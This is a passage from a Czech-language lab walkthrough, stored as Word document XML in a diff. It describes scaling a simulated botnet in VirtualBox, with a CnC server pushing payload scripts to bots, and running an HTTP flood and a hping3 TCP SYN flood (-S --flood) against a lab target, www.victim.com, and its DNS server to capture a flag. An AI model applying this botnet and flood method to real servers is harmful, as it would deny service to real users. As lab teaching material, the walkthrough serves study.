+      <w:r>
+        <w:t>Na botu se tento ping byl zachycen a spustil se script botb.py, což ne naše „žádost“ o payload. A na CnC serveru náš script detekoval žádost bota a poslal mu náš nakopírovaný payload.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">A nakonec znova na botu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>se zobrazilo, co se bude spouštět za script a jelikož u funkce send() máme verbose=true, tak nám to začne vypisovat znázorněné pakety.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Krok 2. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Škálování botnetu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Jelikož ve skutečném světě se používají tisíce přístrojů na </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DDoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> útoky, tak je asi zřejmé, že jeden script toho moc neudělá (mohl by</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pokud by nešlo o čistý </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> útok). Takže první </w:t>
+      </w:r>
+      <w:r>
+        <w:t>krok,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> kter</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ým</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> zvýšíme efektivitu útoku je přidat více strojů (naklonování).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To se může udělat buď přes VirtualBox (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ctrl+O</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), nebo přes „</w:t>
+      </w:r>
+      <w:r>
+        <w:t>vboxmanage</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>clonevm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">“ příkazem, který ovšem potřebuje oprávnění, a navíc pro náš scénář můžeme mít jen pár </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>botů</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, jinak se vypotřebuje výpočetní výkon.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Takže použijeme variantu naklonování ve VB. Změníme jméno a pro ušetření místa použijeme propojený klon. Opakujeme </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>4 krát</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, abychom měli celkem 6 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>botů</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C79488E" wp14:editId="1F9C4C52">
+            <wp:extent cx="3212327" cy="2329994"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
+            <wp:docPr id="1610325890" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1610325890" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3217293" cy="2333596"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Před spuštěním na chvíli přejmenujeme/vymažeme payloadcheck.py, aby se nám nespustil útok předtím, než chceme. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Následně po spuštění musíme každému změnit IP adresu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (stačí inkrementovat o 1 nahoru)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a pro jistotu deaktivovat a aktivovat rozhraní.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3817B872" wp14:editId="29CA0F31">
+            <wp:extent cx="4001243" cy="1749287"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="268965840" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="268965840" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4013614" cy="1754696"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BF3F83" wp14:editId="6AF45A9B">
+            <wp:extent cx="3591426" cy="1038370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1287413124" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1287413124" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3591426" cy="1038370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Takže </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nakonec </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bychom měli mít boty s adresami 192.1.1.11-16. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Krok 3. Útok a jeho dopad</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Na Kali jsou připraveny dva scripty na měření odezvy: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">httpcheck_of_delay_external.py </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tcpcheck_of_delay_external.py</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Každý pro jeden scénář.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Po naklonování a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ujištění, že v payloadcheck.py je zkopírovaný payload_http_test.py</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a stále jde vyhledat adresa Apache serveru</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> můžeme zapnout</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> script na měření odezvy a zapnout naše naklonované stroje</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Příkazem „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> systemctl status &lt;service&gt;“ (u CnC je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>startupbind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a startup, v botnetu je listen a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>beacon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) můžeme dále zkontrolovat, jestli vše proběhlo v pořádku.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Automaticky by útok měl probíhat a odezva by měla </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">začít </w:t>
+      </w:r>
+      <w:r>
+        <w:t>kolísat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, a nakonec i postupně stoupat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6450FAA0" wp14:editId="3E1F824C">
+            <wp:extent cx="2368351" cy="2580515"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="239784159" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="239784159" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId44"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2372612" cy="2585158"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Odpozorováno mám, že normální odezva by se měla pohybovat kolem 0.01-0.05s, s prvním útokem se navýší na 0.1-0.15s s druhým na 0.4-0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se třetím okolo jedné sekundy, kde začíná problém s výpočetní sílou počítače</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a se čtvrtým útokem se začne pohybovat okolo 1-1.5 sekundy</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Nakonec při šesti se začneme pohybovat okolo 4 sekund</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Další zajímavost je, že po 3-5 minutách stálého útoku se server pomalu </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">začne zotavovat – při šesti útocích se odezva snížila z </w:t>
+      </w:r>
+      <w:r>
+        <w:t>~4 sekund na ~1.5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pokud jsme virtuální počítače spouštěli postupně, může se stát, že </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ostatní počítače nemůžou komunikovat s CnC serverem</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, protože síťový provoz se už běžícími útoky zpomalí</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, to se dá vyřešit tím, že na chvíli </w:t>
+      </w:r>
+      <w:r>
+        <w:t>smažeme</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> na CnC serveru </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>payloadcheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a re</w:t>
+      </w:r>
+      <w:r>
+        <w:t>startujeme</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> boty. Po jejich zapnutí můžeme payload zase dát zpět a spustíme </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cnc_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Tím by se </w:t>
+      </w:r>
+      <w:r>
+        <w:t>payload měl poslat na všechny zařízení.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="658D7B1D" wp14:editId="7FB8E99D">
+            <wp:extent cx="3153215" cy="619211"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1043323826" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1043323826" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId45"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3153215" cy="619211"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pokud tedy je útok úspěšný (máme odezvu větší jak nastavenou hodnotu), dostaneme na stránku naši flagu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5EDF84" wp14:editId="6319BEA4">
+            <wp:extent cx="4611269" cy="856583"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="544742762" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="544742762" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId46"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4630943" cy="860238"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Část </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Scénář </w:t>
+      </w:r>
+      <w:r>
+        <w:t>TCP SYN</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> flood</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Krok </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Kontrola</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a příprava</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jelikož se scénář liší jen v jeho útoku</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (používáme Hping3 na místo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Scapy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a ne </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">v </w:t>
+      </w:r>
+      <w:r>
+        <w:t>topologii</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, m</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ůžeme použít podobný postup jak u HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> útoku.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>První však ověříme, že DNS server funguje a to tím, že vyhledáme www.victim.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E06B1DD" wp14:editId="3EB42381">
+            <wp:extent cx="3977360" cy="852816"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
+            <wp:docPr id="493718761" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="493718761" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId47"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3996299" cy="856877"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pokud ano, tak začneme rovnou u CnC serveru, kde stačí změnit obsah </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:t>check</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> souboru na obsah payload_tcp_test.py</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pokud běží minulý útok tak restartujeme každého bota, a po naběhnutí by se měl útok rovnou spustit, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nebo </w:t>
+      </w:r>
+      <w:r>
+        <w:t>můžeme znova použít variantu s </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cnc_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Krok </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Útok a jeho dopad</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pro ukázku output z botnetu (manuálně zapnut script)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673A100B" wp14:editId="4AA78B45">
+            <wp:extent cx="4908589" cy="2525698"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
+            <wp:docPr id="1955091652" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1955091652" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4912216" cy="2527564"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Obsah scriptu je podobný, ale vlastně jen určujeme, jak bude vypadat hping3 příkaz. Nedeklarujeme si cílovou IP adresu a port a nastavíme možnosti u </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>příkazu -S</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, jelikož chceme posílat SYN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> flag a možnost --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pro nejrychlejší zasílaní paketů. Po spuštění, útok zapříčiní, že DNS server portu 53 bude přetížen a neměl by být schopen tak vykonávat jeho službu. Tím pádem normální uživatele, kteří na tuto stránku jdou poprvé (nevědí IP adresu stránky </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId49" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>www.victim.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>), nebudou schopni se na stránku dostat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Spustíme podobný script na ověření odezvy a po nějaké době by měla hodnota překročit požadovanou hodnotu. Tím se přidá na stránku náš řetězec pro splnění úlohy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69AACEB7" wp14:editId="58C91FB1">
+            <wp:extent cx="3162741" cy="714475"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1999655941" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1999655941" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId50"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3162741" cy="714475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
